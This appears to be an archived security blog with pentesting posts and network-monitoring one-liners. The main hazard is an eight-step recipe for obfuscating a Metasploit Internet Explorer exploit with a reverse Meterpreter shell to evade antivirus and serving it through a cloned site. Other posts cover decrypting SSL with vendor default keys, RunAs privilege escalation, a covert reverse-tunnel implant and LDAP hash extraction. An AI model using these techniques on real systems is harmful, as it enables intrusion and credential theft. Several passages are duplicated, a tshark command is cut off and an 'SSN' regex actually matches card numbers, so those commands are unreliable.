12.20.2010
Using default private keys to decrypt SSL streams
An old but hugely overlooked issue. Many appliance vendors ship their units with a default private key for SSL communications. Even if you reissue a new certificate, your appliance could still be using the same private key as everyone else's.. and it's typically bundled within the firmware packages publicly distributed by the application vendor. This affects everything from DD-WRT to enterprise class VPN appliances, tape libraries, and firewalls.
Well, someone has finally begun cataloguing these into a searchable database:
http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/
Just lookup the device in question, point the lookup tool to a running appliance, or feed it a packet capture or live network interface and it will provide any known private keys.
Once the private key is obtained, you can decrypt the SSL stream with tshark:
tshark -nn -t ad -r -o ssl.keys_list:,443,http,"" -V -R http
Note: For successful decryption, the initial full SSL handshake must be present in the capture. A full SSL handshake contains ClientHello, ServerHello, Certificate, ServerHelloDone. If you only see ClientHello, ServerHello, ChangeCipherspec, this is a continuation of a previously established SSL session and cannot be decrypted as is.
Well, someone has finally begun cataloguing these into a searchable database:
http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/
Just lookup the device in question, point the lookup tool to a running appliance, or feed it a packet capture or live network interface and it will provide any known private keys.
Once the private key is obtained, you can decrypt the SSL stream with tshark:
tshark -nn -t ad -r
Note: For successful decryption, the initial full SSL handshake must be present in the capture. A full SSL handshake contains ClientHello, ServerHello, Certificate, ServerHelloDone. If you only see ClientHello, ServerHello, ChangeCipherspec, this is a continuation of a previously established SSL session and cannot be decrypted as is.
12.03.2010
Meterpreter scripts for RunAs privilege escalation & other mischief
send_keystrokes.rb: Meterpreter script to interactively send keystrokes to an open application window using the vbscript SendKeys method. Can be used to escalate privileges into RunAs-invoked command shells on XP.
IE_click_run.rb: Meterpreter script to interactively click "Run" at the IE "File Download Security Warning" prompts. Can be used to escalate privileges into RunAs-invoked IE instances without end-user interaction on XP.
JavaScript Obfuscation of Metasploit Browser Exploits for AV bypass
1. Configure the desired browser exploit and payload. Example using ms10_xxx_ie_css_clip:
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.20.30.40 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used
URIPATH /example no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 10.20.30.40 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
2. "exploit" to start the HTTP server (port 80) and payload handler (port 443).
3. WGET the exploit URI using the --user-agent option to specify the user-agent string of the browser you're targeting. Example for IE7 on XP targets:
wget http://10.20.30.40/example --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft)"
4. View the HTML source and copy all JavaScript between the "script" tags.
5. Feed to a JavaScript obfuscator of your liking. Examples:
http://www.daftlogic.com/projects-online-javascript-obfuscator.htm
http://javascriptcompressor.com
http://dean.edwards.name/weblog/2007/04/packer3
6. Copy obfuscated JS into a new HTML file.
7. Start a new multi/handler to receive the meterpreter_reverse_tcp shell on port 443 (or whatever your payload requires).
8. Serve your newly obfuscated HTML from BT4 through Apache, or clone a site with SET and edit the embedded iFrame tag to point to your HTML file.
Bam. 0-day with AV bypass? Yeah, you're on the pwnie express. :}
Thanks to Will Metcalf for pointing me in the right direction!
References:
http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/
http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html
http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.20.30.40 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used
URIPATH /example no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 10.20.30.40 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
2. "exploit" to start the HTTP server (port 80) and payload handler (port 443).
3. WGET the exploit URI using the --user-agent option to specify the user-agent string of the browser you're targeting. Example for IE7 on XP targets:
wget http://10.20.30.40/example --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft)"
4. View the HTML source and copy all JavaScript between the "script" tags.
5. Feed to a JavaScript obfuscator of your liking. Examples:
http://www.daftlogic.com/projects-online-javascript-obfuscator.htm
http://javascriptcompressor.com
http://dean.edwards.name/weblog/2007/04/packer3
6. Copy obfuscated JS into a new HTML file.
7. Start a new multi/handler to receive the meterpreter_reverse_tcp shell on port 443 (or whatever your payload requires).
8. Serve your newly obfuscated HTML from BT4 through Apache, or clone a site with SET and edit the embedded iFrame tag to point to your HTML file.
Bam. 0-day with AV bypass? Yeah, you're on the pwnie express. :}
Thanks to Will Metcalf for pointing me in the right direction!
References:
http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/
http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html
http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
7.09.2010
Introducing.. the Pwn Plug!
A SheevaPlug microserver loaded
with pentesting goodness!
:: Preloaded with Ubuntu, Metasploit, Fasttrack, SET, SSLstrip, nmap, dsniff, netcat, nikto, nbtscan, xprobe2, inguma, scapy, ettercap, JTR, medusa, & more
:: Maintains a reverse persistent SSH tunnel to your external pentest box, with support for tunneling over HTTP and ICMP
:: Traverses strict egress firewall filters, webfilters, HTTP proxies, and application-aware firewalls
:: Unpingable & no open ports in stealth mode
:: 4.3 x 2.7 x 1.9 inches, 2.3 watts when idle
:: 1.2GHz ARM cpu with 512M SDRAM, 512M flash HDD
6.13.2010
Decoding OpenLDAP & IBM Directory Server password hashes
OpenLDAP {SHA} hashes are base64-encoded hex byte-arrays of the SHA hash. Example:
userpassword:: {SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
The original SHA hash can be extracted from this with the help of fdump (http://sourceforge.net/projects/fdump/files/):
echo -n W6ph5Mm5Pz8GgiULbPgzG37mj9g= |base64 -d - |fdump -
IBM Directory Server, while based on OpenLDAP, implements a botched version of this. Instead of base64 encoding the SHA hash only, they encode the "{SHA}" prefix as well. Example:
userpassword:: e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A==
The SHA hash can be extracted in the same manner by cutting the hex for "{SHA}" (7b 53 48 41 7d) from the result:
echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11-
FTW, let's convert the IBM Directory Server userpassword field back to the OpenLDAP format:
echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11- |xxd -r -p |base64 |awk '{print"{SHA}"$1}'
This is called "taking it back". At $30,000 per IBM Directory Server license, I highly recommend it!
userpassword:: {SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
The original SHA hash can be extracted from this with the help of fdump (http://sourceforge.net/projects/fdump/files/):
echo -n W6ph5Mm5Pz8GgiULbPgzG37mj9g= |base64 -d - |fdump -
IBM Directory Server, while based on OpenLDAP, implements a botched version of this. Instead of base64 encoding the SHA hash only, they encode the "{SHA}" prefix as well. Example:
userpassword:: e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A==
The SHA hash can be extracted in the same manner by cutting the hex for "{SHA}" (7b 53 48 41 7d) from the result:
echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11-
FTW, let's convert the IBM Directory Server userpassword field back to the OpenLDAP format:
echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11- |xxd -r -p |base64 |awk '{print"{SHA}"$1}'
This is called "taking it back". At $30,000 per IBM Directory Server license, I highly recommend it!
4.18.2010
Windows Privilege Escalation Talk - BSides Boston
Presented on Saturday, April 24, 4pm @ Security BSides Boston:
# Title: Escalating privileges through Secondary Logon (RunAs) processes
# Abstract: The scenario: You target a sysadmin PC and obtain a backdoor shell through a browser exploit, PDF with embedded payload, or similar client-side vector. However, because the organization is using RunAs best practices, your shell is running with limited user privileges. Some RunAs-invoked programs are running under the sysadmin's Domain Admin account, but you can't directly migrate to these processes from a limited user shell. The RunAs framework indicates that a user-level process should not be allowed to send commands to a greater privilege process. Sounds fairly solid, but as always, there are exceptions..
Slide deck is available here: http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf
bSides Boston: http://www.securitybsides.com/BSidesBostonTalks
# Title: Escalating privileges through Secondary Logon (RunAs) processes
# Abstract: The scenario: You target a sysadmin PC and obtain a backdoor shell through a browser exploit, PDF with embedded payload, or similar client-side vector. However, because the organization is using RunAs best practices, your shell is running with limited user privileges. Some RunAs-invoked programs are running under the sysadmin's Domain Admin account, but you can't directly migrate to these processes from a limited user shell. The RunAs framework indicates that a user-level process should not be allowed to send commands to a greater privilege process. Sounds fairly solid, but as always, there are exceptions..
Slide deck is available here: http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf
bSides Boston: http://www.securitybsides.com/BSidesBostonTalks
9.09.2009
Forensics: Recovering a 12-year old floppy disk with DD
True story. Earlier this year I was handed a 12-year old floppy disk loaded with bad sectors and unmountable due to a missing/corrupted partition table. A lost cause? Nope. DD can still image the raw media, skipping unreadable sectors and padding the output file with zeros to keep file structures intact wherever possible.
I booted up a Helix Live CD and ran:
dcfldd if=/dev/fd0 of=floppy.img bs=4k conv=noerror,sync
After much grinding and hissing, DD finished with a fully intact 1.4MB floppy disk image. Almost made me want to scour through my old floppy collection. Almost..
I booted up a Helix Live CD and ran:
dcfldd if=/dev/fd0 of=floppy.img bs=4k conv=noerror,sync
After much grinding and hissing, DD finished with a fully intact 1.4MB floppy disk image. Almost made me want to scour through my old floppy collection. Almost..
8.22.2009
NSM: Parsing HTTP sessions with tcpflow
:: Show HTTP requests, replies, etc: tcpflow -i [interface] -c -s port 80 | grep HTTP
:: Show all readable HTTP strings: tcpflow -i [interface] -c -s port 80 | grep -v "\.\."
:: Save HTTP flows to local files: tcpflow -i [interface] -s port 80
:: Show all readable HTTP strings: tcpflow -i [interface] -c -s port 80 | grep -v "\.\."
:: Save HTTP flows to local files: tcpflow -i [interface] -s port 80
NSM: PI detection with grep utils
Here's a simple way to monitor network traffic for compliance with state & federal privacy regulations. Monitoring is especially important on perimeter ISP links, where PI can be seen flying naked into the public Internet.. how embarrassing!
These Ngrep commands will detect unencrypted SSNs and credit card numbers passing through a network:
These Ngrep commands will detect unencrypted SSNs and credit card numbers passing through a network:
:: Spaced SSNs: ngrep -d [interface] -q -t '(\s|^)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2]) \d{2} \d{4}(\s|$)'
:: Dashed SSNs: ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'
:: Dashed CCs (16-digit): ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'
:: Dashed SSNs: ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'
:: Dashed CCs (16-digit): ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'
:: Non-spaced CCs (16-digit): ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})\d{12}(\s|$)'
Storing unencrypted PI on disk is also a big no-no. Here's how to detect these:
:: Spaced/dashed SSNs: pcregrep -r "(\D?\W)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])( |-)\d{2}( |-)\d{4}\D" [folder/drive/network path to search]
:: Spaced/dashed CCs: pcregrep -r "(\D?\W)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})( |-)\d{4}( |-)\d{4}( |-)\d{4}\D" [folder/drive/network path to search]
NSM: Simple network change detection with nmap
I run this daily to see network adds/changes. MAC address changes are also detected, which is useful for spotting ARP cache poisoning and changes to system hardware.
1. Create a baseline list of network hosts:
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt
grep -v # temp.txt | grep -v "appears to be down" > baseline_hosts.txt
rm temp.txt
2. Then, save an updated list of hosts, and compare this against the baseline list:
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt
grep -v # temp.txt | grep -v "appears to be down" > current_hosts.txt
rm temp.txt
grep -v -x -F -f baseline_hosts.txt current_hosts.txt
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt
grep -v # temp.txt | grep -v "appears to be down" > baseline_hosts.txt
rm temp.txt
2. Then, save an updated list of hosts, and compare this against the baseline list:
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt
grep -v # temp.txt | grep -v "appears to be down" > current_hosts.txt
rm temp.txt
grep -v -x -F -f baseline_hosts.txt current_hosts.txt
NSM: Web/email traffic analysis with Bro-IDS
:: Top 10 email senders: grep "FROM: " [Bro_mime.log] | egrep -o "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}" | sort | uniq -c | sort -nr | head -n 10
:: Top 10 email recipients: grep "TO: " [Bro_mime.log] | egrep -o "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}" | sort | uniq -c | sort -nr | head -n 10
:: Top 10 web browser/client apps: cat [Bro_http.log] | grep -i user-agent | cut -f6- -d' ' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 web servers (based on HTTP objects): cat [Bro_http.log] | grep "HOST: " | awk '{ print$5 }' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 DNS A-record queries: cat [Bro_dns.log] | grep "query ?A" | awk '{ print$6 }' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 HTTP server response codes: cat [Bro_http.log] | pcregrep -o '\(\d{3} "' | cut -c 2-5 | sort | uniq -c | sort -nr | head -n 10
:: HTTP POST/GET counts: cat [Bro_http.log] | pcregrep -o "POST|GET" | sort | uniq -c | sort -nr
NSM: Top 10s with Argus!
:: Top 10 web servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 80 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 FTP servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 21 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 SMTP servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 25 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 SMTP clients: ra -nn -r [argus_file] -s saddr - tcp and dst port 25 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 protocols: ra -n -r [argus_file] -s proto | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 TCP ports: ra -nn -r [argus_file] -s dport - tcp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 UDP ports: ra -nn -r [argus_file] -s dport - udp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 source (client) IPs: ra -nn -r [argus_file] -s saddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 destination (server) IPs: ra -nn -r [argus_file] -s daddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 host-pairs: ra -nn -r [argus_file] -s proto saddr dir daddr | grep -v man | awk '{print$2$3$4}' | sort | uniq -c | sort -nr | head -n 10
NSM: SSL handshake analysis with ssldump
:: Total SSL Handshakes: ssldump -n -r [capture_file] | grep Handshake | wc -l
:: Total ClientHellos: ssldump -n -r [capture_file] | grep ClientHello | wc -l
:: List SSL versions negotiated: ssldump -n -r [capture_file] | grep Version | sort | uniq -c | sort -nr
:: List CipherSuites negotiated: ssldump -n -r [capture_file] | grep "cipherSuite" | sort | uniq -c | sort -nr
:: List ServerHello events: ssldump -n -r [capture_file] | grep "ServerHello" | sort | uniq -c | sort -nr
:: List ServerHello events: ssldump -n -r [capture_file] | grep "ServerHello" | sort | uniq -c | sort -nr
:: Total ChangeCipherSpec events: ssldump -n -r [capture_file] | grep ChangeCipherSpec | wc -l
7.29.2008
Hardware Hacking: Ghetto wifi bridge
Subscribe to:
Posts (Atom)